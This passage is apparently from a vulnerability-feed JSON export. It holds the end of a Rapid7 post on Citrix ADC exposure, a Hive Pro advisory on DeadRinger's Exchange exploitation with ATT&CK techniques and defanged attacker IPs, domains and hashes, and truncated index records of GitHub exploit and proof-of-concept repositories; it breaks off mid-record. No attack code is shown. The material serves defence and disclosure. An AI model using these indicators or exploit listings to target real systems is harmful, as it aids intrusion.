\n\n**Cloud providers** likely can just keep doing what they\u2019re doing with regard to Citrix since it does not seem to be widely used, despite [Citrix-provided solutions](<https://www.citrix.com/global-partners/amazon-web-services/citrix-workspace-on-aws.html>) for these environments.\n\n**Government cybersecurity agencies** should keep up the great work they\u2019ve been doing calling attention to threat actor activity and the severity of vulnerabilities in remote access technologies like Citrix.", "cvss3": {}, "published": "2020-11-04T15:24:04", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of Citrix ADC/NetScaler", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-11-04T15:24:04", "id": "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "href": "https://blog.rapid7.com/2020/11/04/nicer-protocol-deep-dive-internet-exposure-of-citrix-adc-netscaler/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nMicrosoft Exchange Server vulnerabilities have been officially patched for five months now. These vulnerabilities are actively exploited by multiple threat actors named DeadRinger. DeadRinger has been affecting the telecommunication industry all around the world. DeadRinger consists of three clusters. The first one includes the threat group Softcell, which has been active since 2012. The Naikon group, which has been active since 2020, is the second cluster. 
We discovered that the signatures match those of TG-3390, making it the third cluster.\n\nAs a response, Hive Pro Threat Researchers advise that you address these vulnerabilities.\n\nThe techniques used by DeadRinger include: \nT1592: Gather Victim Host Information \nT1595: Active Scanning \nT1590: Gather Victim Network Information \nT1190: Exploit Public-Facing Application \nT1059: Command and Scripting Interpreter \nT1047: Windows Management Instrumentation \nT1059.001: Command and Scripting Interpreter: PowerShell \nT1505.003: Server Software Component: Web Shell \nT1136: Create Account \nT1053: Scheduled Task/Job \nT1078: Valid Accounts \nT1574: Hijack Execution Flow \nT1027.005: Obfuscated Files or Information: Indicator Removal from Tools \nT1027: Obfuscated Files or Information \nT1036: Masquerading \nT1070.006: Indicator Removal on Host: Timestomp \nT1140: Deobfuscate/Decode Files or Information \nT1040: Network Sniffing \nT1087: Account Discovery \nT1018: Remote System Discovery \nT1071.001: Application Layer Protocol: Web Protocols \nT1041: Exfiltration Over C2 Channel \nT1021.002: Remote Services: SMB/Windows Admin Shares \nT1550.002: Use Alternate Authentication Material: Pass the Hash \nT1105: Ingress Tool Transfer \nT1555: Credentials from Password Stores \nT1003: OS Credential Dumping \nT1016: System Network Configuration Discovery \nT1069: Permission Groups Discovery \nT1560: Archive Collected Data \nT1569: System Services \nT1543.003: Create or Modify System Process: Windows Service \nT1574.002: Hijack Execution Flow: DLL Side-Loading \nT1570: Lateral Tool Transfer \nT1056.001: Input Capture: Keylogging \nT1573: Encrypted Channel\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 47.56.86[.]44 \n45.76.213[.]2 \n45.123.118[.]232 \n101.132.251[.]212 \nSHA-1 Hash | 19e961e2642e87deb2db6ca8fc2342f4b688a45c \nba8f2843e2fb5274394b3c81abc3c2202d9ba592 
\n243cd77cfa03f58f6e6568e011e1d6d85969a3a2 \nc549a16aaa9901c652b7bc576e980ec2a008a2e0 \nc2850993bffc8330cff3cb89e9c7652b8819f57f \n440e04d0cc5e842c94793baf31e0d188511f0ace \ne2340b27a4b759e0e2842bfe5aa48dda7450af4c \n15336340db8b73bf73a17c227eb0c59b5a4dece2 \n5bc5dbe3a2ffd5ed1cd9f0c562564c8b72ae2055 \n0dc49c5438a5d80ef31df4a4ccaab92685da3fc6 \n81cfcf3f8213bce4ca6a460e1db9e7dd1474ba52 \ne93ceb7938120a87c6c69434a6815f0da42ab7f2 \n207b7cf5db59d70d4789cb91194c732bcd1cfb4b \n71999e468252b7458e06f76b5c746a4f4b3aaa58 \n39c5c45dbec92fa99ad37c4bab09164325dbeea0 \nefc6c117ecc6253ed7400c53b2e148d5e4068636 \na3c5c0e93f6925846fab5f3c69094d8a465828e9 \na4232973418ee44713e59e0eae2381a42db5f54c \n5602bf8710b1521f6284685d835d5d1df0679b0f \ne3fcda85f5f42a2bffb65f3b8deeb523f8db2302 \n720556854fb4bcf83b9ceb9515fbe3f5cb182dd5 \nb699861850e4e6fde73dfbdb761645e2270f9c9a \n6516d73f8d4dba83ca8c0330d3f180c0830af6a0 \n99f8263808c7e737667a73a606cbb8bf0d6f0980 \na5b193118960184fe3aa3b1ea7d8fd1c00423ed6 \n92ce6af826d2fb8a03d6de7d8aa930b4f94bc2db \nd9e828fb891f033656a0797f5fc6d276fbc9748f \n87c3dc2ae65dcd818c12c1a4e4368f05719dc036 \nDomain | Cymkpuadkduz[.]xyz \nnw.eiyfmrn[.]com \njdk.gsvvfsso[.]com \nttareyice.jkub[.]com \nmy.eiyfmrn[.]com \nA.jrmfeeder[.]org \nafhkl.dseqoorg[.]com \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>\n\n#### References\n\n<https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos>\n\n<https://www.zdnet.com/article/deadringer-chinese-apts-strike-major-telecommunications-companies/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T11:01:05", "type": "hivepro", "title": "Have you patched the vulnerabilities in Microsoft Exchange Server?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-08-18T11:01:05", "id": "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "href": "https://www.hivepro.com/have-you-patched-the-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-15T15:36:14", "description": "# CVE-2021-26855_SSRF\nCVE-2021-26855 Exchange ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T07:28:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 
10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855", "CVE-2021-26865", "CVE-2021-26858"], "modified": "2021-12-15T14:41:36", "id": "35B21CE7-1E51-5824-B70E-36480A6E8763", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T13:06:47", "description": "# HAFNIUM-IOC\nHafnium-IOC is a simple PowerShell script that run...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T17:36:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26858", "CVE-2021-26857", "CVE-2021-26865"], "modified": 
"2022-01-12T11:59:39", "id": "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:04", "description": "# Exchange_IOC_Hunter\n\n#### Description:\n\nHunt for IOCs in IIS L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T10:36:44", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26855"], "modified": "2021-03-17T10:22:07", "id": "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-15T01:18:31", "description": "### This project has been discontinued\n\nPlease use Microsoft too...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, 
"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-05T08:22:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-26857", "CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-02-14T23:14:09", "id": "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:20", "description": " contains a remote co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-27T02:28:48", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-05-27T14:19:48", "id": "CF2E9209-48FF-5375-8638-93E7CC964EB3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:14:58", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-11T20:38:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-01-22T10:33:16", "id": "4BE00B6F-1555-52F8-948D-D2F52AEC2DC7", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-26T21:20:59", "description": "# CVE-2021-21985 (Vulnerable Code) \n\n script ...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "E90678A1-4183-5E58-A4E2-5E48E8767D92", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:28:09", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "7CEBB62C-173B-50CD-A252-B6522523EE57", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:21:32", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "8DBBEAEC-C905-52CD-B95C-87663EA9C145", "href": "", 
"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:59:30", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Improper Authentication in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2022-08-17T19:20:50", "id": "51858F11-1259-5A40-82DF-DD7D62A7B11A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:54:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-08T10:42:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-28T06:33:59", "id": "3BFD8B83-5790-508D-8B9C-58C171517BD0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:27:24", "description": "# Citrix Analysis Notebook\n\nA jupyter notebook to aid in automat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T04:59:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-02-21T02:51:51", "id": "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:08", "description": "# CVE-2019-19781_IOCs\nIOCs for CVE-2019-19781\n\ncitrixhoneypotnsl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T19:32:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T19:37:59", "id": "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:48", "description": "# CVE-2019-19781\n\u6279\u91cf\u6982\u5ff5\u9a57\u8b49\u7528\n\u4f7f\u7528\u9650\u5236\n----------------------...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T06:09:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T06:23:10", "id": "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:04", "description": "# Detect-CVE-2019-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T10:09:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": 
